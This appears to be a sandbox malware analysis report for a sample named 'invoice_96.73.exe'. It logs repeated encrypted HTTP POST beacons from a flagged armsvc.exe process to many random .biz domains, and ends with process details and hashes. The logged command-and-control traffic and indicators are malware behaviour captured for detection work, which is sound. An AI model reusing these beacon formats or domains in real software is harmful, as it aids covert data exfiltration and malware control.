Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 28, 2024 12:14:11.802828074 CET | 358 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:14:11.802855968 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:12.136631966 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 28 Nov 2024 11:14:11 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 28, 2024 12:14:12.137566090 CET | 358 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:14:12.137662888 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:12.473395109 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 28 Nov 2024 11:14:12 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 22
Source IP: 192.168.2.22
Source Port: 49185
Destination IP: 13.251.16.150
Destination Port: 80
PID: 3320
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:54.369817019 CET | 352 | OUT | POST /nqtlxhjrub HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:13:54.369838953 CET | 852 | OUT | Data Raw: c9 e7 ac b6 79 ba ca d3 48 03 00 00 6d b5 4a ea 35 41 77 38 41 d6 46 b5 c8 3f 65 c6 38 f7 f1 29 b9 1f 9c c6 5b 44 b5 4d 4b c8 ca 91 55 dc c7 05 8f 9b 22 a0 4b f1 96 6c 34 a1 95 2b 2b a0 10 8a 9c fe 92 9b 39 a8 9e 37 32 a4 76 f7 a1 a3 d6 3c df 0b
Data Ascii: yHmJ5Aw8AF?e8)[DMKU"Kl4++972v<.1YnIxm/ePku|5V4{;>slI.y"Pcw#<=rD/CPTZ;9HHeRjZ}90\b$e~\8{a4Bb
Nov 28, 2024 12:13:56.477401018 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:13:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4a7069d728887beb527f5d9c4e2d2943|8.46.123.228|1732792436|1732792436|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 23
Source IP: 192.168.2.22
Source Port: 49186
Destination IP: 44.221.84.105
Destination Port: 80

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:14:02.058919907 CET | 360 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:14:02.058959007 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:03.249955893 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:14:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=07132753af640df4c40e01f0293c9eda|8.46.123.228|1732792443|1732792443|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
24 | 192.168.2.22 | 49187 | 54.244.188.177 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:14:03.509871006 CET | 359 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: dwrqljrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:14:03.509922028 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
    Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:04.919552088 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:14:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=6d0d2529ed264265f20a263abfdf7721|8.46.123.228|1732792444|1732792444|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
25 | 192.168.2.22 | 49195 | 54.244.188.177 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:14:10.286494017 CET | 360 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: oshhkdluh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:14:10.286504030 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
    Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:11.646691084 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:14:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=110ecdcf7ea03180bcffcfc1ee76985d|8.46.123.228|1732792451|1732792451|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
26 | 192.168.2.22 | 49197 | 54.244.188.177 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:14:14.484957933 CET | 359 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lrxdmhrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:14:14.484957933 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
    Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:15.842375040 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:14:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c18e78590580350308040f993c69d829|8.46.123.228|1732792455|1732792455|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
27 | 192.168.2.22 | 49198 | 18.141.10.107 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:14:16.101162910 CET | 358 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: wllvnzb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:14:16.101200104 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
    Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:18.085047960 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:14:17 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a3ba9762a679e84bb94497b6ff88bd7c|8.46.123.228|1732792457|1732792457|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.22 | 49199 | 18.208.156.248 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:14:18.349129915 CET | 356 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gnqgo.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:14:18.349159956 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
    Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:19.537911892 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:14:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=30241183af168205776a11a816c6ab7a|8.46.123.228|1732792459|1732792459|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
29 | 192.168.2.22 | 49200 | 44.221.84.105 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:14:19.784257889 CET | 359 | OUT | POST /tgcwttfqletfhyq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: jhvzpcfg.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:14:19.784285069 CET | 852 | OUT | Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
    Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
Nov 28, 2024 12:14:20.945897102 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:14:20 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=3ea9774096a2d46bd0a8e46cadb39451|8.46.123.228|1732792460|1732792460|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 30
Source IP: 192.168.2.22
Source Port: 49201
Destination IP: 18.141.10.107
Destination Port: 80

Timestamp: Nov 28, 2024 12:14:21.202102900 CET, Bytes transferred: 359, Direction: OUT
Data:
POST /tgcwttfqletfhyq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852

Timestamp: Nov 28, 2024 12:14:21.202122927 CET, Bytes transferred: 852, Direction: OUT
Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ

Timestamp: Nov 28, 2024 12:14:23.276252031 CET, Bytes transferred: 412, Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:14:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=05729616c5c7c743d3e0a34459642e56|8.46.123.228|1732792462|1732792462|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 31
Source IP: 192.168.2.22
Source Port: 49203
Destination IP: 18.208.156.248
Destination Port: 80

Timestamp: Nov 28, 2024 12:14:25.713617086 CET, Bytes transferred: 359, Direction: OUT
Data:
POST /tgcwttfqletfhyq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852

Timestamp: Nov 28, 2024 12:14:25.713659048 CET, Bytes transferred: 852, Direction: OUT
Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ

Timestamp: Nov 28, 2024 12:14:26.903322935 CET, Bytes transferred: 412, Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:14:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1f6c6f4d4c5247b22ef27aac1d0b707b|8.46.123.228|1732792466|1732792466|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 32
Source IP: 192.168.2.22
Source Port: 49204
Destination IP: 13.251.16.150
Destination Port: 80

Timestamp: Nov 28, 2024 12:14:27.160298109 CET, Bytes transferred: 357, Direction: OUT
Data:
POST /tgcwttfqletfhyq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852

Timestamp: Nov 28, 2024 12:14:27.160310030 CET, Bytes transferred: 852, Direction: OUT
Data Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ

Timestamp: Nov 28, 2024 12:14:29.268652916 CET, Bytes transferred: 410, Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:14:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1a21cc3742f3b8565cf5054b01655761|8.46.123.228|1732792468|1732792468|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



Target ID: 0
Start time: 06:11:49
Start date: 28/11/2024
Path: C:\Users\user\Desktop\invoice_96.73.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\invoice_96.73.exe"
Imagebase: 0x400000
File size: 1'799'680 bytes
MD5 hash: 0AD46265C37A53172D0658E862699A0E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:11:49
Start date: 28/11/2024
Path: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase: 0x400000
File size: 1'658'880 bytes
MD5 hash: 38BDB885A492FB07195A5DF3F45BA0BB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: false

